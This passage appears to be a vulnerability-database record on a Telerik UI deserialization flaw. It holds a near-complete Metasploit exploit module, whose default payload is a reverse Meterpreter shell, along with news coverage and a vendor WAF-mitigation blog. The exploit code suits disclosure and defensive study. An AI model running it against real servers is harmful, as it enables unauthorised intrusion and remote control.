'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || \"#{Rex::Text.rand_text_alphanumeric(rand(4..35))}.dll\"\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document['metaData']).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"#{encrypt(serialized_object.to_json.encode('UTF-16LE'))}&#{encrypt(serialized_object_type.encode('UTF-16LE'))}\", nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/telerik_rau_deserialization.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-aPh3AyK7bqc/YQfQByUmHnI/AAAAAAAADaU/NmwrUQl8ZRcRsgL1Y2FPj8U64wKdrMlLACLcBGAsYHQ/s0/apt-hacker.jpg>)\n\nA new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services ([IIS](<https://en.wikipedia.org/wiki/Internet_Information_Services>)) servers to infiltrate their networks.\n\nIsraeli cybersecurity firm Sygnia, which identified the campaign, is tracking the advanced, stealthy adversary under the moniker \"Praying Mantis\" or \"TG2021.\"\n\n\"TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine's memory and leaves little-to-no trace on infected targets,\" the researchers [said](<https://www.sygnia.co/praying-mantis-targeted-apt>). \"The threat actor also uses an additional stealthy backdoor and several post-exploitations modules to perform network reconnaissance, elevate privileges, and move laterally within networks.\" \n\n[](<https://thehackernews.com/images/-ZP-P4VwOZxI/YQfQWTuCuiI/AAAAAAAADac/u-zO1cQst2UuJ9lV7I9J_dj369CMBpmhgCLcBGAsYHQ/s0/hacker-attack.jpg>)\n\nBesides exhibiting capabilities that show a significant effort to avoid detection by actively interfering with logging mechanisms and successfully evading commercial endpoint detection and response (EDR) systems, the threat actor has been known to leverage an arsenal of ASP.NET web application exploits to gain an initial foothold and backdoor the servers by executing a sophisticated implant named \"NodeIISWeb\" that's designed to load custom DLLs as well as intercept and handle HTTP requests received by the server.\n\n[](<https://thehackernews.com/images/-50djfDO2Prg/YQfQlpOifCI/AAAAAAAADag/Zr7kLjdvhak0dndsJENUEv_mJYyfng4hwCLcBGAsYHQ/s0/hacking-news.jpg>)\n\nThe vulnerabilities that are taken advantage of by the actor include:\n\n * Checkbox Survey RCE Exploit ([CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>))\n * VIEWSTATE Deserialization Exploit\n * Altserialization Insecure Deserialization\n * Telerik-UI Exploit ([CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) and [CVE-2017-11317](<https://nvd.nist.gov/vuln/detail/CVE-2017-11317>))\n\nInterestingly, Sygnia's investigation into TG1021's tactics, techniques, and procedures (TTPs) have unearthed \"major overlaps\" to those of a nation-sponsored actor named \"[Copy-Paste Compromises](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>),\" as detailed in an advisory released by the Australian Cyber Security Centre (ACSC) in June 2020, which described a cyber campaign targeting public-facing infrastructure primarily through the use of unpatched flaws in Telerik UI and IIS servers. However, a formal attribution is yet to be made.\n\n\"Praying Mantis, which has been observed targeting high-profile public and private entities in two major Western markets, exemplifies a growing trend of cyber criminals using sophisticated, nation-state attack methods to target commercial organizations,\" the researchers said. \"Continuous forensics activities and timely incident response are essential to identifying and effectively defending networks from attacks by similar threat actors.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T11:11:00", "type": "thn", "title": "New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2021-27852"], "modified": "2022-02-23T04:34:16", "id": "THN:942BFBB34DF6A24E460572684F648005", "href": "https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2020-08-07T08:03:43", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. The part of the parameter before the \u201c&\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object's defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even 